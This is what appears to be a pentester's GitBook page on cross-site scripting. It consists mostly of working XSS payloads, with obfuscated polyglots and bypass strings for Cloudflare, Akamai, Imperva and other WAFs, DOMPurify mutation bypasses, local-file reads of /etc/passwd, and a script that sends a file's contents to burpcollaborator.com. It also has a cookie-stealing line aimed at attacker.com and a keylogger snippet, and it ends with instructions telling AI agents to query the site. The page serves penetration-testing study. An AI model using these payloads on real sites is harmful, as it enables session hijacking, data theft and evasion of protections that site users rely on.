<!–>/*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*%0D%0AContent-Type:text/html%0D%0A%0D%0A</Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>
JavaScript://%250Aalert?.(1)//*’/*\’/*”/*\”/*`/*\`/*%26apos;)/*<!–></Title/</Style/</Script/</textArea/</iFrame/</noScript>\74k<K/contentEditable/autoFocus/OnFocus=/*${/*/;{/**/(alert)(1337)}//><Base/Href=//X55.is\76–>\
```

## XSS Cuneiform-alphabet based

`𒀀='',𒉺=!𒀀+𒀀,𒀃=!𒉺+𒀀,𒇺=𒀀+{},𒌐=𒉺[𒀀++], 𒀟=𒉺[𒈫=𒀀],𒀆=++𒈫+𒀀,𒁹=𒇺[𒈫+𒀆],𒉺[𒁹+=𒇺[𒀀] +(𒉺.𒀃+𒇺)[𒀀]+𒀃[𒀆]+𒌐+𒀟+𒉺[𒈫]+𒁹+𒌐+𒇺[𒀀] +𒀟][𒁹](𒀃[𒀀]+𒀃[𒈫]+𒉺[𒀆]+𒀟+𒌐+"(𒀀)")()`

{% embed url="<https://twitter.com/RootMoksha/status/1782295118504173919>" %}

### In search bar

<http://url.com/search?title=\\>\<xss\_payload>

```
"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"
```

## ISO-2022-JP

{% embed url="<https://hackvertor.co.uk/hack-pad/5>" %}

## Invisible Javascript

<https://x.com/aemkei/status/1843756978147078286>

{% embed url="<https://blog.worldline.tech/2023/07/19/invisible-code.html>" %}

{% embed url="<https://benjaminaster.com/invisible-javascript/?s=03>" %}

## XSS using github pages

{% embed url="<https://github.com/yogsec/xss-test>" %}

## Header Injection

{% content-ref url="http-header-exploitation" %}
[http-header-exploitation](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/http-header-exploitation)
{% endcontent-ref %}

## Server Side - PDF Generator

```
<iframe src=file:///etc/passwd></iframe>
```

{% embed url="<https://book.hacktricks.xyz/pentesting-web/xss-cross-site-scripting/server-side-xss-dynamic-pdf>" %}

{% content-ref url="ssrf" %}
[ssrf](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/ssrf)
{% endcontent-ref %}

## XSS to read local file

```javascript
<script>
    x=new XMLHttpRequest;
    x.onload=function(){
        document.write(this.responseText)
    };
    x.open("GET","file:///etc/passwd");
    x.send();
</script>
```

```javascript
<script>
    function addNewlines(str) {
        var result = '';
        while (str.length > 0) {
            result += str.substring(0, 100) + '\n';
            str = str.substring(100);
        }
        return result;
    }

    x = new XMLHttpRequest();
    x.onload = function(){
        document.write(addNewlines(btoa(this.responseText)))
    };
    x.open("GET", "file:///etc/passwd");
    x.send();
</script>
```

```javascript
<script>
        var readfile = new XMLHttpRequest(); // Read the local file
        var exfil = new XMLHttpRequest(); // Send the file to our server
        readfile.open("GET","file:///var/www/html/dev-text.php", true);
        readfile.send();
        readfile.onload = function() {
            if (readfile.readyState === 4) {
                var url = 'http://burpcollaborator.com?data='+btoa(this.response);
                exfil.open("GET", url, true);
                exfil.send();
            }
        }
        readfile.onerror = function(){document.write('<a>Oops!</a>');}
        </script>
```

```javascript
<img src="xasdasdasd" onerror="document.write('<iframe src=file:///etc/passwd></iframe>')"/>
```

```javascript
<script>document.write('<iframe src=file:///etc/passwd></iframe>');</script>
```

{% embed url="<https://blog.dixitaditya.com/xss-to-read-internal-files>" %}

## Prototype Pollution

{% embed url="<https://research.securitum.com/wp-content/uploads/sites/2/2020/08/ScreenFlow.mp4>" %}

{% embed url="<https://research.securitum.com/prototype-pollution-and-bypassing-client-side-html-sanitizers/>" %}

## For Red Teaming

{% embed url="<https://trustedsec.com/blog/js-tap-weaponizing-javascript-for-red-teams?s=03>" %}

{% embed url="<https://github.com/hoodoer/JS-Tap>" %}

{% embed url="<https://github.com/Sharpforce/XSS-Exploitation-Tool>" %}

### XSS Keylogger

{% embed url="<https://github.com/11whoami99/XSS-keylogger/tree/main>" %}

## XSS With JSFuck

{% embed url="<https://jsfuck.com/>" %}

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FotIrS2L1HMN1gfT0WS1N%2FGfQSg8dWMAAx4yk.jpg?alt=media&#x26;token=adc394b8-1293-4472-9601-a80ff0615bcd" alt=""><figcaption></figcaption></figure>

Convert `document.location='http://attacker.com?'+document.cookie` with JSFuck.&#x20;

Put the result inside `<button autofocus onfocus=(eval)([JSFuck])></button>`

## WAF Bypass

{% content-ref url="waf-bypass" %}
[waf-bypass](https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/waf-bypass)
{% endcontent-ref %}

```javascript
"><input%0a%0atype="hidden"%0a%0aoncontentvisibilityautostatechange=confirm(/Bypassed/)%0d%0astyle=content-visibility:auto>
"><input type="hidden" oncontentvisibilityautostatechange="confirm(/Bypassed/)" style="content-visibility:auto">
<p oncontentvisibilityautostatechange="alert(/FirefoxOnly/)" style="content-visibility:auto">
```

```
# alert(origin):

W=!![];H=(W+"")[3];di="al";me="rt";qq="( origin )";meydi=di+H+me+qq;[]["fill"]["constructor"](meydi)()
```

### Bypass Filters

{% embed url="<https://d3adend.org/xss/ghettoBypass>" %}

{% embed url="<https://github.com/masatokinugawa/filterbypass/wiki/Browser's-XSS-Filter-Bypass-Cheat-Sheet>" %}

{% embed url="<https://johnermac.github.io/notes/ewptx/xssfilter/>" %}

{% embed url="<https://brutelogic.com.br/blog/bypassing-whitelists-with-xss-payloads-in-attributes/>" %}

<pre><code><strong>#JavaScript and brackets () filtered
</strong><strong>
</strong><strong>&#x3C;a href="jav&#x26;#x0A;a
</strong>script:&#x26;#x0A;confirm``">click me&#x3C;/a>
</code></pre>

```
# Bypass filters

## filter that removes any script tags.
<img src="test" onerror=alert("Hello") />

## alert is filtered
<img src="test" onerror=confirm("Hello") />

## The word hello is filtered
<img src="test" onerror=alert("HHelloello") />
```

```
1) alert = window["al"+"ert"] 
2) bypass () with `` 
3) replace space with / 
4) encode symbols: 
< = %3c 
> = %3e 
" = %22 
[ = %5b 
] = %5d 
` = %60
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FOeQ42PeOv61fRk9dZ2Em%2FGZm881zXEAE83DZ.jpg?alt=media&#x26;token=795f02b9-75ee-40b0-ae6f-1e77ceb389d6" alt=""><figcaption></figcaption></figure>

{% embed url="<https://github.com/Edr4/XSS-Bypass-Filters>" %}

```javascript
1%27/prompt?.(1)/%27
*prompt(document.domain)*
"><img src=x onerrora=confirm() onerror=confirm(1)>
<img//////src=x oNlY=1 oNerror=alert('xxs')//
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt1>
<img/src/onerror=setTimeout(atob(/YWxlcnQoMTMzNyk/.source))>
<img%20hrEF="x"%20sRC="data:x,"%20oNLy=1%20oNErrOR=prompt`1`//>
<a+HREF="%26%237 javascrip%26%239t: alert%261par;document .domain) *>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
&#34;&gt;&lt;track/onerror=&#x27;confirm\%601\%60&#x27;&gt;
<Img Src=OnXSS OnError={prompt`1`}>
"><img src=x onerrora=confirm() onerror=confirm(1)>
<svg/ONxss='0'/ONload=location=window[`atob`]`amF2YXNjcmlwdDphbGVydCgxKQ==`;//
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
"><div/onclick="(function(){setTimeout(()%20=>%20alert(document.domain),%200);})();">Click%20me!</div>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmb GFyZSBCeXBhc3NlZCA6KQ=="))>
<iframe+/ON+onload=%20alert(/str0d/)>
<inpuT autofocus oNFocus="setTimeout(function() { /*\`*/top['al'+'\u0065'+'rt']([!+[]+!+[]]+[![]+[]][+[]])/*\`*/ }, 5000);"></inpuT%3E&lT;/stYle&lT;/titLe&lT;/teXtarEa&lT;/scRipt&gT;
"><body/onload="{x:onerror=alert};x"
<svg/%20src=x%20onmouseover%3D%22alert%26%230000000040%3B1)
<Img Src=OnXSS OnError=confirm(1)>
```

Bypass Akamai, Imperva and CloudFlare

```
<A HRef=//X55.is AutoFocus %26%2362 OnFocus%0C=import(href)>
```

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xsswafbypss.txt>" %}

```
"&quot;"ontoggle=[JS]
"' &quot;'"ontoggle=[JS]
```

{% embed url="<https://onetest.fr/posts/xss-waf-bypass-one-payload-for-all/>" %}

Use this tricks to bypass `alert` block by XSS WAF

```
(function(x){this[x+`ert`](1)})`al` 

window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2) 

document['default'+'View'][`\u0061lert`](3)

parent[/al/.source+/ert/.source](1)

parent[/al/.source.concat(/ert/.source)](2)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FlCU2ILC8Y2IcjZkbI6YB%2FGQl0gOnWsAAEr7o.jpg?alt=media&#x26;token=a38c3d9d-39d2-46c0-a959-305450682b1d" alt=""><figcaption></figcaption></figure>

```
confirm?.(1)
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FDUGRY1SFLdHoL8ZhbsfY%2FGQkBy6gWEAAI9z2.png?alt=media&#x26;token=dbb337f4-670d-4642-b880-495465f94f00" alt=""><figcaption></figcaption></figure>

```javascript

CloudFlare
<Img Src=OnXSS OnError=alert(1)> 

Imperva

<Img Src=//X55.is OnLoad%0C=import(Src)// 

Akamai 
<A AutoFocus HRef %252F=""OnFocus=top/**/?.['al'%2B'ert'](1)>


<svg/onload=alert/*1337*/(1)> 
<svg/onload=alert//&NewLine;(2)> 
<svg/onload=alert&sol;**&sol;(3)> 
<svg/onload=alert/&#42;&#42;/(4)> 
<svg/onload=alert&#x2F;**&#47;(5)>
```

Amazon / Cloudflare WAF Bypass :

```javascript
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

```javascript
1">K='><Svg OnLoad=(confirm)(1)>
```

```javascript
<a/href="javascript:Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">ClickMe
```

### mXSS (Mutated XSS)

{% embed url="<https://jorianwoltjer.com/blog/p/hacking/mutation-xss>" %}

<https://x.com/therceman/status/1862093437467496722?t=SZ07gfch6y1Zmj83xC6whA&s=03>

**mXSS (Mutated Cross-Site Scripting**) occurs when a browser unexpectedly processes and transforms seemingly safe HTML tags or attributes, allowing malicious scripts to bypass filters and execute.

While libraries like DomPurify are designed to mitigate such attacks, some versions have been exploited by researchers who have discovered new ways to trick the browser and bypass this defense mechanisms.

However, not every developer is aware of DomPurify, or they may choose not to use it for various reasons, opting instead to create their own filters or validators dor safe HTML. This is where mXSS becomes particularly effective in bypassing custum protection measures

```javascript
<iframe><style id="</iframe><img src=1 onerror=alert(1337)>">
<noframes><style id="</noframes><img src=1 onerror=alert(1337)>">
<noscript><p id="</noscript><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src=1 onerror=alert(1337)>">
<style><p id="</style><img src="1" onerror="alert(1337)">">"&gt;
<svg><style><img src="1" onerror="alert(1337)">
<math><style><img src="1" onerror="alert(1337)">
<math><style></style></math><img src="1" onerror="alert(1337)">
<select><style><input><img src=1 onerror=alert(1337)></select>
<select></select><input><img src="1" onerror="alert(1337)">
<body><title><p id="</title><img src onerror=alert(1337)>"></title>
<body><noscript><p id="</noscript><img src onerror=alert(1337)>">
<maths><style><!--</style><img src onerror=alert(1337)>--></style></maths>
<svg><style>/*<img src onerror=alert(1337)>*/</style></svg>
<math><style>/*<img src onerror=alert(1337)>*/
<noscript><style>/*</noscript><img src onerror=alert(1337)>*/
<math><annotation-xml><style><img src onerror=alert(1337)></style></annotation-xml></math>
<body><textarea><a is="</textarea><img src onerror=alert(1337)>">
<math><annotation-xml encoding="text/html"><x><svg><mtext><textarea><a is="</textarea><img src onerror=alert(1337)>">
<form><math><mtext></form><form><mglyph><svg><mtext><title><path is="</title><img src onerror=alert(1337)>">
```

{% embed url="<https://ensy.zip/posts/dompurify-323-bypass/>" %}

```javascript
<math><foo-test><mi><li><table><foo-test><li></li></foo-test><a>
      <style>
        <! \${
      </style>
      }
      <foo-b id="><img src onerror='alert(1)'>">hmm...</foo-b>
    </a></table></li></mi></foo-test></math>
```

### WhatWaf

{% embed url="<https://github.com/Ekultek/WhatWaf>" %}

### CloudFlare

Payload : `%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E`

{% embed url="<https://twitter.com/grumpzsux/status/1784432507565625672>" %}

```javascript
<Img Src=OnXSS OnError=confirm(document.cookie)>
```

```javascript
 ‘>alert(154)</script><script/154=’;;;;;;;
```

```javascript
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>

"><Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBYU1MgQG1fa2VsZXBjZQ=="))>
```

```javascript
<svg/onload=window["al"+"ert"](1337)>
<Img Src=OnXSS OnError=confirm(1337)>
<Svg Only=1 OnLoad=confirm(document.domain)>
<svg onload=alert&#0000000040document.cookie)>
<sVG/oNLY%3d1/**/On+ONloaD%3dco\u006efirm%26%23x28%3b%26%23x29%3b>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
<Img Src=//X55.is OnLoad%0C=import(Src)>
<Svg Only=1 OnLoad=confirm(atob("Q2xvdWRmbGFyZSBCeXBhc3NlZCA6KQ=="))>
OnXSS=<Img/Src/OnError=alert(1)>
"%2Bself[%2F*foo*%2F'alert'%2F*bar*%2F](self[%2F*foo*%2F'document'%2F*bar*%2F]['domain'])%2F%2F
'<00 foo="<a%20href="javascript:alert('XSS-Bypass')">XSS-CLick</00>--%20/
<Img/Src/OnError=(alert)(1)>
```

```javascript
<select><​style></select>
<svg onload​=alert(1)> 
<​/style>
```

```javascript
"><img src=x onerrora=confirm() onerror​=confirm(1)>
```

```javascript
<dETAILS%0aopen%0aonToGgle%0a%3d%0aa%3dprompt,a(origin)%20x>
```

```javascript
<svg onload​=alert&#0000000040"1")><"">
```

```
Normal payload :
";alert(1)// ( 403 Blocked By Cloudflare ) 

Bypass :
";(a=alert,b=1,a(b))// ( 200 OK ) 
```

### CloudFront

```javascript
">'><details/open/ontoggle=confirm('XSS')>
6'%22()%26%25%22%3E%3Csvg/onload=prompt(1)%3E/
';window/*aabb*/['al'%2b'ert'](document./*aabb*/location);//
">%0D%0A%0D%0A<x '="foo"><x foo='><img src=x onerror=javascript:alert(cloudfrontbypass)//'>
```

### Akamai

```javascript
<a%20href=%0dj&Tab;avascript&colon;x='trela'.split('').reverse().join('');self[x](origin)>
```

```javascript
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](document%2Bcookie)>
```

```javascript
 <!--><svg+onload=%27top[%2fal%2f%2esource%2b%2fert%2f%2esource](document.cookie)%27>
```

Akamai: Stored XSS via cache poisoning <https://twitter.com/WllGates/status/1788179999100444802>

```javascript
"><a nope="%26quot;x%26quot;"onmouseover="Reflect.get(frames,'ale'+'rt')(Reflect.get(document,'coo'+'kie'))">
```

Akamai:

```javascript
'"><A HRef=" AutoFocus OnFocus=top/**/?.'ale'%2B'rt'>"
';k='e'%0Atop['al'+k+'rt'](1)//
'"><A HRef=\" AutoFocus OnFocus=top/**/?.['ale'%2B'rt'](1)>
```

In Redirect Parameter using HTTP Parameter Pollution and Double URL Encode:

```
/login?ReturnUrl=javascript:1&ReturnUrl=%2561%256c%2565%2572%2574%2528%2564%256f%2563%2575%256d%2565%256e%2574%252e%2564%256f%256d%2561%2569%256e%2529
```

### Imperva

{% embed url="<https://github.com/BishopFox/Imperva_gzip_WAF_Bypass>" %}

```javascript
<Img Src=//X55.is OnLoad%0C=import(Src)>
<sVg OnPointerEnter="location=javas+cript:ale+rt%2+81%2+9;//</div">
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle=&#x0000000000061;
lert&#x000000028;origin&#x000029;>
<a/href="j%0A%0Davascript:{var{3:s,2:h,5:a,0:v,4:n,1:e}='earltv'}[self][0][v+a+e+s](e+s+v+h+n)(/infected/.source)" />click
```

### Sucuri

```
<a aa aaa aaaa aaaaaa href=j&#97v&#97script&#x3A;&#97lert(document.cookie)>ClickMe

<a href="j&#97;vascript&#x3A;&#97;lert('Sucuri WAF Bypassed ! ' + document.domain + '\nCookie: ' + document.cookie); window&#46;location&#46;href='https://evil.com';">ClickMe</a>
```

### Amazon WAF

```
<details x=xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx:2 open ontoggle="prompt(document.cookie);">
```

### Modsecurity

```
<svg onload='new Function["Y000!"].find(al\u0065rt)'>

```

### RXSS

```
<img src=x onerror=alert(document.domain)//
```

```
%3Csvg+on+onload%3D%28alert%29%28document.domain%29%3E
```

### Alert(1)

```
'a'.replace.call`1${/./}${alert}`/
```

```
[alert][0].call(this,1)
```

{% embed url="<https://twitter.com/bbr_bug/status/1782986740963426710?s=03&t=tC3J2e2WNH4B0Ly6S632Eg>" %}

### Stored XSS

```
https://www\.target\.com/redirectEndpoint.do?redirectPage=redacted&itemFromOrder="'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>


"'`//><Svg+Only%3d1+OnLoad%3dconfirm(atob("WW91IGhhdmUgYmVlbiBoYWNrZWQgYnkgb3R0ZXJseSE"))>
```

{% embed url="<https://twitter.com/ott3rly/status/1783053325656572086?s=03&t=d-CTangBtY74Mf6sqmclbA>" %}

## ASP

```
%u003Csvg onload=alert(1)>
%u3008svg onload=alert(2)> 
%uFF1Csvg onload=alert(3)>
```

```
parameter=<svg/&parameter=onload=alert()>
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FXUpjJCSTlifbHbFLsjJs%2Fimage.png?alt=media&#x26;token=5fae6e11-3d2a-430a-b74b-453195394736" alt=""><figcaption></figcaption></figure>

```
/(A(%22onerror='alert%60123%60'test))/
```

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2F8dIBdHPqpB3E5twL7kVz%2Fimage.png?alt=media&#x26;token=4ff70339-15bc-49c5-aac7-bbff4c7b64a6" alt=""><figcaption></figcaption></figure>

## Keylogger

```
# Keylogger example - Source TryHackMe
 <script type="text/javascript">
 let l = ""; // Variable to store key-strokes in
 document.onkeypress = function (e) { // Event to listen for key presses
   l += e.key; // If user types, log it to the l variable
   console.log(l); // update this line to post to your own server
 }
</script> 
```

## Resources

{% embed url="<https://www.yeswehack.com/learn-bug-bounty/xss-attacks-exploitation-ultimate-guide>" %}

{% embed url="<https://portswigger.net/web-security/cross-site-scripting>" %}

{% embed url="<https://www.hackerone.com/knowledge-center/how-xss-payloads-work-code-examples-preventing-them>" %}

{% embed url="<https://docs.veracode.com/r/cross-site-scripting-xss>" %}

{% embed url="<https://www.intigriti.com/hackademy/cross-site-scripting-xss>" %}

## Payloads

{% embed url="<https://testdintrusion.fr/pentest/web/injections%26inclusions/xss/>" %}

{% embed url="<https://portswigger.net/web-security/cross-site-scripting/cheat-sheet>" %}

{% embed url="<https://github.com/coffinxp/payloads/blob/main/xss.txt>" %}

{% embed url="<https://github.com/payloadbox/xss-payload-list>" %}

{% embed url="<https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/XSS%20Injection>" %}

{% embed url="<https://github.com/trilokdhaked/Bug-Bounty-Methodology/blob/main/Cross%20Site%20Scripting.md>" %}

## Tools

{% embed url="<https://github.com/ferreiraklet/airixss>" %}

{% embed url="<https://github.com/dwisiswant0/findom-xss>" %}
findom-ss
{% endembed %}

{% embed url="<https://github.com/xnl-h4ck3r/knoxnl>" %}

{% embed url="<https://github.com/hahwul/dalfox>" %}

{% embed url="<https://github.com/iamunixtz/LazyXss>" %}

{% embed url="<https://github.com/blackhatethicalhacking/XSSRocket>" %}

{% embed url="<https://github.com/thecybertix/CyberXS>" %}

{% embed url="<https://github.com/s0md3v/XSStrike>" %}

{% embed url="<https://blog.intigriti.com/hacking-tools/hacker-tools-xsstrike-hunting-for-low-hanging-fruits>" %}

{% embed url="<https://github.com/rix4uni/xsschecker>" %}

{% embed url="<https://www.kali.org/tools/beef-xss/>" %}

See [XSS Discovery](#xss-discovery) for more tools

## [Earn Free Crypto / BTC with Cointiply](https://cointiply.com/r/pkZxp)

[**Play Games Earn Cash Rewards**](https://cointiply.com/r/pkZxp)

<figure><img src="https://4199783661-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFF3hT6DtJlHn9jAel9%2Fuploads%2FtT3srZzbUxV8iN6zjNrl%2Fimage.png?alt=media&#x26;token=962e4759-e8b9-4e26-b998-6df524fdfaf8" alt=""><figcaption></figcaption></figure>

## Interesting Books

{% content-ref url="../../interesting-books" %}
[interesting-books](https://0xss0rz.gitbook.io/0xss0rz/interesting-books)
{% endcontent-ref %}

{% hint style="info" %}
**Disclaimer**: As an Amazon Associate, I earn from qualifying purchases. This helps support this GitBook project at no extra cost to you.
{% endhint %}

* [**The Web Application Hacker’s Handbook**](https://www.amazon.fr/dp/1118026470?tag=0xss0rz-21) The go-to manual for web app pentesters. Covers XSS, SQLi, logic flaws, and more
* [**Bug Bounty Bootcamp: The Guide to Finding and Reporting Web Vulnerabilities**](https://www.amazon.fr/dp/1718501544?tag=0xss0rz-21) Learn how to perform reconnaissance on a target, how to identify vulnerabilities, and how to exploit them
* [**Real-World Bug Hunting: A Field Guide to Web Hacking**](https://www.amazon.fr/dp/1593278616?tag=0xss0rz-21) Learn about the most common types of bugs like cross-site scripting, insecure direct object references, and server-side request forgery.

## Support this Gitbook

I hope it helps you as much as it has helped me. If you can support me in any way, I would deeply appreciate it.

[![ko-fi](https://ko-fi.com/img/githubbutton_sm.svg)](https://ko-fi.com/Y8Y41FQ2GA)

[![buymeacoffee](https://cdn.buymeacoffee.com/buttons/v2/default-yellow.png)](https://buymeacoffee.com/0xss0rz)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://0xss0rz.gitbook.io/0xss0rz/pentest/web-attacks/xss.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.